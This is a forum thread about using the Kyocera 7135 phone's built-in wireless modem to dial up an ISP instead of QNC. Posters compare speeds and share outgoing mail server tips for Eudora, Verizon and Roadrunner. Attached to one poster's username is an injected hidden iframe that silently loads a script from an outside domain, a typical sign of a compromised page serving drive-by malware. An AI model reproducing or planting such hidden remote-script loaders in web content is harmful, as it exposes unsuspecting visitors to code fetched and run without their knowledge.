+ Reply to Thread

Wireless Modem Internet Connection

Just wanted to share an oberservation some of you may find useful. I have no idea why this hasn't struck me sooner and maybe it's self evident to everyone else. I do not use EN, I've been connecting to the internet via qnc since I received my 7135. Tonight I was determined to get Eudora mail up and running. In order to send an email, I have to actually connect to Earthlink in order to access their SMTP server. So I set up a wireless modem connection and dialup to the ISP, log into the server, and send /receive email. NP.

I then figure I can surf with this configuration and IMO my connection to the internet is NOTICEABLY faster than through QNC! Again, this is so self-evident I don't know why it's taken me this long to realize it. Sorry if this is old news. For those of you using QNC, and have an ISP with dialup, you might want to give the wireless modem option a try and see if your throughput improves.

Falstaffpac<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

You can use QNC to connect this way as well, you don't need to dial your ISP. The increased speed is because the phone has bottlenecks in the processor and in its apps, your computer is much quicker and so its more able to take advantage of the available bandwidth.
    Sorry, but I no longer make 7135 headset adapters.

Just to clarify, I never had my phone connected to a computer. I was connecting to my ISP via dialup and using EIS browser and Avantgo on the phone. It seemed to me the dialup connection had improved throughput as compared to the qnc connection. Then again, I've been at work for the past 12 hours and maybe its just wishful thinking

falstaffpac

Geek
    Yeah, I tried dialing up to a regular ISP with my phone in the hopes it would be faster. But the modem built into the phone is a 14.4 modem. So you're ISP may be a little faster at 14.4 than QNC but it shouldn't be too much of a difference.

As far as setting up the e-mail, set your outgoing mail server to mail.airbridge.net (assuming you're on Verizon, like me). I had found that little tip a while ago on here and was so happy! I could receive mail from my ISP but couldn't send out.

I tried to call Verizon to find out what their outgoing server was and I got a very nice older woman who really busted her hump trying to get an answer for me, but she was clueless. And when she transferred me to another more technical dept they just couldn't dump me out of their queue back into regular customer service before they'd even let me finish my question.

Thanks mattb,

Thats helpful information!

falstaffpac

Re: Wireless Modem Internet Connection

Originally posted by falstaffpac
    I then figure I can surf with this configuration and IMO my connection to the internet is NOTICEABLY faster than through QNC!
    I also have my Earthlink account configured and occasionally use it when QNC is having hiccups. I have not noticed any speed improvements as compared to QNC when it is acting normally. I also have a Budget Dialup account and never needed to use it. I do find QNC establishes connection faster than either ISP but I keep them configured as a security blanket since I need to be able to end/receive info even if VZW messaging wanes.

Unfortunately, when the Verizon network is really acting up, it usually affects access to ALL other ISPs.

Mattb5
    Did you set up your outgoing mail with Verizon with mail.airbridge.net? because they tell me that it is not for the 7135 please let me know I have set my in coming with Roadrunner and they won't let me do the outgoing with them so I need to know what to use for the outgoing

Using Eudora my ISP lets me send out going mail only if I check for mail first. So if I just hit "send mail" it will not work, but if I select "Send & check" mail it works.

2nGlenn